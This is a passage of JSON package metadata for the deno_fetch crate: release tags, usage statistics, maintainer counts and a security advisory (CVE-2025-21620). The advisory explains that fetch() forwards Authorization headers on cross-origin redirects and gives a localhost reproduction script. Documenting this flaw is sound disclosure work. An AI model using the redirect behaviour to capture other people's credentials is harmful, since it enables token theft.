aff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-30T06:14:54.313Z","dependent_packages_count":19,"downloads":842406,"downloads_period":"total","dependent_repos_count":43,"rankings":{"downloads":4.737023083363234,"dependent_repos_count":4.480793394363669,"dependent_packages_count":2.11521488728328,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":0.9807439301518956,"average":2.0622669663838287},"purl":"pkg:cargo/deno_fetch","advisories":[{"uuid":"GSA_kwCzR0hTQS1mMjdwLWNtdjgteGhtNs4ABC_L","url":"https://github.com/advisories/GHSA-f27p-cmv8-xhm6","title":"fetch: Authorization headers not dropped when redirecting cross-origin","description":"### Summary\nWhen you send a request with the `Authorization` header to one domain, and the response asks to redirect to a different domain, Deno's`fetch()` redirect handling creates a follow-up redirect request that keeps the original `Authorization` header, leaking its content to that second domain.\n\n\n### Details\n\nThe [right behavior](https://fetch.spec.whatwg.org/#ref-for-cors-non-wildcard-request-header-name) would be to drop the `Authorization` header instead, in this scenario. The same is generally applied to `Cookie` and `Proxy-Authorization` headers, and is done for not only host changes, but also protocol/port changes. Generally referred to as \"origin\".\n\nThe [documentation](https://docs.deno.com/runtime/reference/web_platform_apis/#:~:text=Deno%20does%20not%20follow%20the,leaking%20authenticated%20data%20cross%20origin.) states: \n\u003e Deno does not follow the same-origin policy, because the Deno user agent currently does not have the concept of origins, and it does not have a cookie jar. This means Deno **does not need** to protect against leaking authenticated data cross origin \n\n### Reproduction\n```ts\nconst ac = new AbortController()\n\nconst server1 = Deno.serve({ port: 3001, signal: ac.signal }, (req) =\u003e {\n  return new Response(null, {\n    status: 302,\n    headers: {\n      'location': 'http://localhost:3002/redirected'\n    },\n  })\n})\n\nconst server2 = Deno.serve({ port: 3002, signal: ac.signal }, (req) =\u003e {\n  const body = JSON.stringify({\n    url: req.url,\n    hasAuth: req.headers.has('authorization'),\n  })\n  return new Response(body, {\n    status: 200,\n    headers: {'content-type': 'application/json'},\n  })\n})\n\nasync function main() {\n  const response = await fetch(\"http://localhost:3001/\", {\n    headers: {authorization: 'Bearer foo'}\n  })\n  const body = await response.json()\n  \n  ac.abort()\n  \n  if (body.hasAuth) {\n    console.error('ERROR: Authorization header should not be present after cross-origin redirect')\n  } else {\n    console.log('SUCCESS: Authorization header is not present after cross-origin redirect')\n  }\n}\n\nsetTimeout(main, 500)\n```\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-01-06T22:27:09.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-f27p-cmv8-xhm6","https://nvd.nist.gov/vuln/detail/CVE-2025-21620","https://github.com/advisories/GHSA-f27p-cmv8-xhm6"],"source_kind":"github","identifiers":["GHSA-f27p-cmv8-xhm6","CVE-2025-21620"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2025-01-06T23:08:01.132Z","updated_at":"2026-08-29T17:05:48.356Z","epss_percentage":0.00514,"epss_percentile":0.4159,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mMjdwLWNtdjgteGhtNs4ABC_L","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1mMjdwLWNtdjgteGhtNs4ABC_L","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.1.2","vulnerable_version_range":"\u003e= 2.0.0, \u003c 2.1.2"},{"first_patched_version":null,"vulnerable_version_range":"\u003c= 1.46.3"}],"purl":"pkg:cargo/deno"},{"ecosystem":"cargo","package_name":"deno_fetch","versions":[{"first_patched_version":"0.204.0","vulnerable_version_range":"\u003e= 0.0.1, \u003c 0.204.0"}],"purl":"pkg:cargo/deno_fetch"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mMjdwLWNtdjgteGhtNs4ABC_L/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_fetch","docker_dependents_count":19,"docker_downloads_count":18696296,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_fetch","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_fetch/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T03:37:30.716Z","issues_count":6632,"pull_requests_count":9650,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":582,"issue_authors_count":2478,"avg_comments_per_issue":2.5061821471652594,"avg_comments_per_pull_request":0.7196891191709844,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1201,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":185,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2354694485842026,"past_year_avg_comments_per_pull_request":1.11240632805995,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"